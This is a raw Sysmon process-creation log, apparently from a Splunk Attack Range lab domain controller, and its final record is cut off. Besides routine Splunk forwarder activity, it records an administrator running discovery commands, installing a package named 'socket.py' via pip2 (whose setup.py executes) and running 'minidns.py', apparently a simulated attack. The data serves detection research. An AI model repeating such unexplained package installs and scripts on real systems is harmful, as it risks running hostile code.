AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065850Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:12:17.652{A8622C2F-57D1-6078-CE0D-00000000AE01}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065838Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:12:16.970{A8622C2F-57D0-6078-CD0D-00000000AE01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065829Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:12:16.322{A8622C2F-57D0-6078-CC0D-00000000AE01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065701Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:53.185{A8622C2F-57B9-6078-CB0D-00000000AE01}1644C:\cygwin64\bin\cut.exe-----cut -d ' ' -f1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=487E5A2213745CFA36F8F16C359277EF,SHA256=DCD6B25EB6108D6A9AE5611E76894A1BA96D4EEA1988DBFFC777385FE52FB057,IMPHASH=3B690E684E157EE43866F8ADD488640B{A8622C2F-57B9-6078-C90D-00000000AE01}1612C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 154100x800000000000000065694Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:53.183{A8622C2F-57B9-6078-CA0D-00000000AE01}6164C:\cygwin64\bin\hostname.exe-----hostname -I C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-57B9-6078-C90D-00000000AE01}1612C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 154100x800000000000000065686Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:53.177{A8622C2F-57B9-6078-C90D-00000000AE01}1612C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-57B9-6078-C80D-00000000AE01}4560C:\Python27\python.exeC:\Python27\python.exe minidns.py 154100x800000000000000065678Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:53.132{A8622C2F-57B9-6078-C80D-00000000AE01}4560C:\Python27\python.exe-----C:\Python27\python.exe minidns.pyC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-57B9-6078-C70D-00000000AE01}2824C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065659Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:53.102{A8622C2F-57B9-6078-C70D-00000000AE01}2824C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065543Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:22.396{A8622C2F-579A-6078-C60D-00000000AE01}6432C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065528Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.728{A8622C2F-5799-6078-C50D-00000000AE01}6656C:\cygwin64\bin\tzset.exe-----"C:\cygwin64\bin\tzset.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9A334E31142D616401445D77D38B145A,SHA256=3D76C166E2D05B23A6E164B1F9C251C771AEF4E423B00C2EBE4080682C93C243,IMPHASH=36078269731E740E482547ADAAC73406{A8622C2F-5799-6078-C40D-00000000AE01}4252C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065518Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.719{A8622C2F-5799-6078-C40D-00000000AE01}4252C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-C30D-00000000AE01}6416C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065508Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.711{A8622C2F-5799-6078-C30D-00000000AE01}6416C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065496Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.695{A8622C2F-5799-6078-C20D-00000000AE01}5864C:\cygwin64\bin\hostname.exe-----"C:\cygwin64\bin\hostname.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-5799-6078-C10D-00000000AE01}1996C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065486Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.686{A8622C2F-5799-6078-C10D-00000000AE01}1996C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-C00D-00000000AE01}2824C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065476Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.678{A8622C2F-5799-6078-C00D-00000000AE01}2824C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065462Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.664{A8622C2F-5799-6078-BF0D-00000000AE01}5744C:\cygwin64\bin\id.exe-----"C:\cygwin64\bin\id.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=5800D64A2799F3182F90A7DBC34B5B1D,SHA256=0B939F24A18CBAF7C8FBBF8A8AE4F474CBDF61BD54870D687A584DA4B29E1FD3,IMPHASH=7D3F9B4155D2A624AD839B9C7F2F075A{A8622C2F-5799-6078-BE0D-00000000AE01}5628C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065452Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.655{A8622C2F-5799-6078-BE0D-00000000AE01}5628C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BD0D-00000000AE01}2112C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065442Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.647{A8622C2F-5799-6078-BD0D-00000000AE01}2112C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065419Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.628{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BB0D-00000000AE01}5384C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000065404Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.613{A8622C2F-5799-6078-BB0D-00000000AE01}5384C:\cygwin64\bin\mintty.exe3.4.7.0TerminalminttyAndy Koppe / Thomas Wolff-"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico -C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=50431EE2883CD9A0A8C5EA1E1F4230FB,SHA256=4CE199A128F2A4C81D4CC148F584E477B2503A60BDB7CD7378FDFF75911FBD59,IMPHASH=0842AFFFBDCBF477F24E7B64DE1026AD{A8622C2F-5799-6078-B80D-00000000AE01}5332C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000065390Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.583{A8622C2F-5799-6078-B90D-00000000AE01}5340C:\cygwin64\bin\cygwin-console-helper.exe-----"\\?\C:\cygwin64\bin\cygwin-console-helper.exe" 0x418 0x41CC:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8BFA89E9045A949619C8511955C39779,SHA256=7B4BB51FC16D1B4F44D2A73D9939C177008D5DB4E9EECCA42A9D01D90D7C8CEF,IMPHASH=DC4FCFEBC59A5F04DB2C6D852B01071C{A8622C2F-5799-6078-B80D-00000000AE01}5332C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000065356Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:21.481{A8622C2F-5799-6078-B80D-00000000AE01}5332C:\cygwin64\bin\mintty.exe3.4.7.0TerminalminttyAndy Koppe / Thomas Wolff-"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico -C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=50431EE2883CD9A0A8C5EA1E1F4230FB,SHA256=4CE199A128F2A4C81D4CC148F584E477B2503A60BDB7CD7378FDFF75911FBD59,IMPHASH=0842AFFFBDCBF477F24E7B64DE1026AD{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000065327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:20.645{A8622C2F-5798-6078-B70D-00000000AE01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065299Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:19.973{A8622C2F-5797-6078-B60D-00000000AE01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065289Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:19.300{A8622C2F-5797-6078-B50D-00000000AE01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065238Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:17.633{A8622C2F-5795-6078-B30D-00000000AE01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065228Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:16.967{A8622C2F-5794-6078-B20D-00000000AE01}5392C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065218Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:16.300{A8622C2F-5794-6078-B10D-00000000AE01}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065150Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:10.023{A8622C2F-578E-6078-B00D-00000000AE01}3300C:\cygwin64\bin\cut.exe-----cut -d ' ' -f1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=487E5A2213745CFA36F8F16C359277EF,SHA256=DCD6B25EB6108D6A9AE5611E76894A1BA96D4EEA1988DBFFC777385FE52FB057,IMPHASH=3B690E684E157EE43866F8ADD488640B{A8622C2F-578E-6078-AE0D-00000000AE01}3304C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 154100x800000000000000065143Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:10.021{A8622C2F-578E-6078-AF0D-00000000AE01}2952C:\cygwin64\bin\hostname.exe-----hostname -I C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-578E-6078-AE0D-00000000AE01}3304C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 154100x800000000000000065135Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:10.016{A8622C2F-578E-6078-AE0D-00000000AE01}3304C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-578D-6078-AD0D-00000000AE01}644C:\Python27\python.exeC:\Python27\python.exe minidns.py 154100x800000000000000065127Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:09.971{A8622C2F-578D-6078-AD0D-00000000AE01}644C:\Python27\python.exe-----C:\Python27\python.exe minidns.pyC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-578D-6078-AC0D-00000000AE01}2424C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065108Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:09.961{A8622C2F-578D-6078-AC0D-00000000AE01}2424C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-830D-00000000AE01}6836C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000065057Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:07.144{A8622C2F-578B-6078-AB0D-00000000AE01}4560C:\Python27\python.exe-----c:\python27\python.exe -u -c "import sys, setuptools, tokenize; sys.argv[0] = 'c:\\users\\admini~1\\appdata\\local\\temp\\2\\pip-install-hhhogx\\socket.py\\setup.py'; __file__='c:\\users\\admini~1\\appdata\\local\\temp\\2\\pip-install-hhhogx\\socket.py\\setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record c:\users\admini~1\appdata\local\temp\2\pip-record-qukxb0\install-record.txt --single-version-externally-managed --compilec:\users\admini~1\appdata\local\temp\2\pip-install-hhhogx\socket.py\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5789-6078-A90D-00000000AE01}3264C:\Python27\python.exe"c:\python27\python.exe" "C:\Python27\Scripts\pip2.exe" install socket.py 154100x800000000000000065042Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:06.883{A8622C2F-578A-6078-AA0D-00000000AE01}4420C:\Python27\python.exe-----c:\python27\python.exe -c "import sys, setuptools, tokenize; sys.argv[0] = 'c:\\users\\admini~1\\appdata\\local\\temp\\2\\pip-install-hhhogx\\socket.py\\setup.py'; __file__='c:\\users\\admini~1\\appdata\\local\\temp\\2\\pip-install-hhhogx\\socket.py\\setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" egg_info --egg-base pip-egg-infoc:\users\admini~1\appdata\local\temp\2\pip-install-hhhogx\socket.py\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5789-6078-A90D-00000000AE01}3264C:\Python27\python.exe"c:\python27\python.exe" "C:\Python27\Scripts\pip2.exe" install socket.py 154100x800000000000000065026Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:05.642{A8622C2F-5789-6078-A90D-00000000AE01}3264C:\Python27\python.exe-----"c:\python27\python.exe" "C:\Python27\Scripts\pip2.exe" install socket.pyC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5789-6078-A80D-00000000AE01}5872C:\Python27\Scripts\pip2.exepip2 install socket.py 154100x800000000000000065018Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:05.633{A8622C2F-5789-6078-A80D-00000000AE01}5872C:\Python27\Scripts\pip2.exe-----pip2 install 